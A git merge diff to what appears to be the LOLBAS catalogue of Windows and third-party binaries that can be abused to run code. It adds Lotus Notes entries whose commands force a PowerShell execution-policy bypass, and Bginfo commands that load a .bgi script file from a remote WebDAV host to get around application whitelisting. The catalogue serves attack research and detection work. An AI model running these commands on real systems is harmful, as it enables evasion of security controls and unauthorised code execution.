Merge branch 'master' into master

LOLBins.md

@@ -92,6 +92,8 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 
 # OTHER NON MICROSOFT BINARIES
 [Gpup.exe](OtherBinaries/Gpup.md)    
+[Nlnotes.exe](OtherBinaries/Nlnotes.md)     
+[Notes.exe](OtherBinaries/Notes.md)     
 [Nvuhda6.exe](OtherBinaries/Nvuhda6.md)     
 [Nvudisp.exe](OtherBinaries/Nvudisp.md)    
 [VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)     

OSLibraries/Syssetup.md

@@ -8,12 +8,14 @@ rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.IN
 
 Acknowledgements:
 * Pierre-Alexandre Braeken - @pabraeken
+* Matt harr0ey - @harr0ey  
 
 Code sample:
 * 
 
 Resources:
 * https://twitter.com/pabraeken/status/994392481927258113
+* https://twitter.com/harr0ey/status/975350238184697857
 
 Full path:
 ```

OtherBinaries/Nlnotes.md

@@ -0,0 +1,31 @@
+## Nlnotes.exe
+
+* Functions: Execute
+
+```
+NLNOTES.EXE  /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
+```
+
+Acknowledgements:
+* Daniel Bohannon - @danielhbohannon   
+
+Code sample:
+*
+
+Resources:
+* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
+* https://twitter.com/HanseSecure/status/995578436059127808
+
+
+Full path:
+```
+?
+```
+
+Notes:
+Used by Lotus Notes
+
+
+Detection:
+
+ 

OtherBinaries/Notes.md

@@ -0,0 +1,31 @@
+## Notes.exe
+
+* Functions: Execute
+
+```
+Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } 
+```
+
+Acknowledgements:
+* Daniel Bohannon - @danielhbohannon   
+
+Code sample:
+*
+
+Resources:
+* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
+* https://twitter.com/HanseSecure/status/995578436059127808
+
+
+Full path:
+```
+C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe    
+```
+
+Notes:
+Used by Lotus Notes
+
+
+Detection:
+
+ 

OtherMSBinaries/Bginfo.md

@@ -3,11 +3,35 @@
 * Functions: Execute
 
 ```
-bginfo.exe bginfo.bgi /popup /nolicprompt
+bginfo.exe bginfo.bgi /popup /nolicprompt    
-(Add vbs code inside .bgi file)
+
+"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt    
+
+"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt   
 ```
 
 Acknowledgements:
 * Oddvar Moe - @oddvarmoe
-   
+
-   
+Code sample:
+* https://github.com/api0cradle/BGInfo/blob/master/BGITool_1.0.ps1
+
+Resources: 
+* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/   
+* https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/  
+* https://twitter.com/Oddvarmoe/status/865330067630694400   
+* https://twitter.com/ItsReallyNick/status/996133093613424641   
+* https://github.com/3gstudent/bgi-creater   
+* https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/  
+
+Full path:
+```
+No fixed path
+```
+
+Notes:
+Used to set background image in Windows with details about the environment
+
+
+Detection:
+Bginfo.exe requesting files externally or running VBS scripts.

README.md

@@ -34,7 +34,7 @@ Also, please be patient if it takes some time for your contribution to be added
 Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse. 
 I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee)
 Would really love if the community could contribute as much as possible. That would make it better for everyone.
-If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you.
+If you think it is hard to make a pull request using github, don't hesitate to send me a tweet and I will add the contribution for you.
 
 
 ## STORY
@@ -78,4 +78,4 @@ Love this logo:
 - [ ] Map it to the Mitre Att&ck <3
 - [ ] LOLGuiBins
 - [ ] More list based on classifications
-- [ ] LOLBAS lists for Linux? OSX?
+- [ ] LOLBAS lists for Linux? OSX?